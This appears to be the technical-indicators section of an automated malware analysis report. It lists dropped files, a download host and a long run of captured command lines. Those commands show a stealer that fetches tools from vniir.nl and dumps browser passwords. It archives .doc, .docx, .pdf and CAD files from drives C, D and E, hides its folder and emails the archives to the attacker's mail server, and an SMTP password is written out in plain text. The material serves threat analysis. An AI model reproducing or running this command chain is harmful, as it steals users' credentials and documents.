Technical Information
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %APPDATA%\windows\curl.exe
- %APPDATA%\windows\find.cmd
- %APPDATA%\windows\driver.exe
- %APPDATA%\windows\pas.rar
- %APPDATA%\windows\blat.exe
- %APPDATA%\windows\wbpv.exe
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- %APPDATA%\windows\wbpv.exe
- 'vn##r.nl':80
- http://vn##r.nl/file/driver.exe
- http://vn##r.nl/file/pas.rar
- DNS ASK vn##r.nl
- '%APPDATA%\windows\curl.exe' -o %APPDATA%\Windows\driver.exe vniir.nl/file/driver.exe
- '%APPDATA%\windows\curl.exe' -o %APPDATA%\Windows\pas.rar vniir.nl/file/pas.rar
- '%APPDATA%\windows\driver.exe' x -r -ep2 -hplimpid2903392 %APPDATA%\Windows\pas.rar blat.exe %APPDATA%\Windows\find.cmd /y
- '%APPDATA%\windows\driver.exe' x -r -ep2 -hplimpid2903392 %APPDATA%\Windows\pas.rar wbpv.exe %APPDATA%\Windows\find.cmd /y
- '%APPDATA%\windows\blat.exe' -to in@vniir.nl -f "PASS<sent@vniir.nl>" -server mail.vniir.nl -port 587 -u sent@vniir.nl -pw 6DSjyEDwzQwKnp4G3PG3 -subject "Document dwbplvnegg/user" -body "Document dwbplvnegg/user" -attach...
- '%APPDATA%\windows\driver.exe' a -r -ep -hplimpid2903392 %APPDATA%\Windows\doc-c.rar C:\*.doc /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\wbpv.exe /stext "%APPDATA%\Windows\password.txt"
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "dwg-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\dwg-d.rar D:\*.dwg /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\m3d-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "m3d-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\m3d-d.rar D:\*.m3d /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\SLDPRT-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "SLDPRT-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user"...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\SLDPRT-d.rar D:\*.SLDPRT /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\pdf-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PDF-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\SLDPRT-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\Windows\find.cmd" "
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOCX-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-d.rar D:\*.docx /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\doc-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOC-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\doc-d.rar D:\*.doc /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\cdw-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\pdf-d.rar D:\*.pdf /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\cdw-c.rar C:\*.cdw /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\dwg-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "dwg-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\dwg-c.rar C:\*.dwg /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\dwg-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\m3d-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\cdw-d.rar D:\*.cdw /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\cdw-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd bat1.bat
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "m3d-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\cdw-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "cdw-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\cdw-e.rar E:\*.cdw /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\dwg-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "dwg-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\dwg-e.rar E:\*.dwg /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\m3d-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "cdw-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\m3d-e.rar E:\*.m3d /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\SLDPRT-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\curl.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\SLDPRT-e.rar E:\*.SLDPRT /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\pdf-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PDF-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-e.rar E:\*.pdf /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\docx-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOCX-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "SLDPRT-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user"...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\doc-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOC-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\doc-e.rar E:\*.doc /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "cdw-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "m3d-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\docx-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\docx-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOCX-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" ...
- '%WINDIR%\syswow64\attrib.exe' +s +h %APPDATA%\Windows
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set mail-in=in@vniir.nl
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\password.txt
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\doc-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-e.rar E:\*.docx /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set smtp=mail.vniir.nl
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\pdf-c.rar C:\*.pdf /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PDF-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe x -r -ep2 -hplimpid2903392 %APPDATA%\Windows\pas.rar blat.exe %APPDATA%\Windows\find.cmd /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set pass-out=6DSjyEDwzQwKnp4G3PG3
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\curl.exe -o %APPDATA%\Windows\pas.rar vniir.nl/file/pas.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\pdf-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\doc-c.rar C:\*.doc /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-c.rar C:\*.docx /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOC-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe x -r -ep2 -hplimpid2903392 %APPDATA%\Windows\pas.rar wbpv.exe %APPDATA%\Windows\find.cmd /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\m3d-c.rar C:\*.m3d /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "SLDPRT-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user"...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\curl.exe -o %APPDATA%\Windows\driver.exe vniir.nl/file/driver.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\wbpv.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PASS<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -bo...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set mail-out=sent@vniir.nl
- '%WINDIR%\syswow64\cmd.exe' /c echo>%APPDATA%\Windows\find.cmd cd %APPDATA%\Windows\
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\SLDPRT-c.rar C:\*.SLDPRT /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-e.rar E:\*.pdf /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PDF-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe x -r -ep2 -hplimpid2903392 %APPDATA%\Windows\pas.rar blat.exe %APPDATA%\Windows\find.cmd /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\curl.exe -o %APPDATA%\Windows\pas.rar vniir.nl/file/pas.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\pdf-e.rar' (with hidden window)
- '%WINDIR%\syswow64\attrib.exe' +s +h %APPDATA%\Windows' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PDF-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\doc-e.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-e.rar E:\*.docx /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>%APPDATA%\Windows\find.cmd cd %APPDATA%\Windows\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOCX-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\docx-e.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "m3d-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "SLDPRT-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user"...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd bat1.bat' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe x -r -ep2 -hplimpid2903392 %APPDATA%\Windows\pas.rar wbpv.exe %APPDATA%\Windows\find.cmd /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\cdw-e.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\dwg-e.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\curl.exe -o %APPDATA%\Windows\driver.exe vniir.nl/file/driver.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\curl.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\SLDPRT-e.rar E:\*.SLDPRT /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set mail-out=sent@vniir.nl' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\dwg-e.rar E:\*.dwg /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set pass-out=6DSjyEDwzQwKnp4G3PG3' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\m3d-e.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "m3d-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set smtp=mail.vniir.nl' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\m3d-e.rar E:\*.m3d /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\SLDPRT-e.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd set mail-in=in@vniir.nl' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "dwg-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOC-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\cdw-d.rar D:\*.cdw /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\doc-e.rar E:\*.doc /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\docx-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOCX-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "cdw-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\pdf-c.rar C:\*.pdf /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PDF-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\doc-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOC-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\doc-d.rar D:\*.doc /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\pdf-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\cdw-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\SLDPRT-c.rar C:\*.SLDPRT /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\cdw-c.rar C:\*.cdw /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\dwg-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "SLDPRT-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user"...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "cdw-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\dwg-c.rar C:\*.dwg /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\SLDPRT-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\m3d-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\docx-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "PASS<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -bo...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\pdf-d.rar D:\*.pdf /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-d.rar D:\*.docx /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "dwg-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
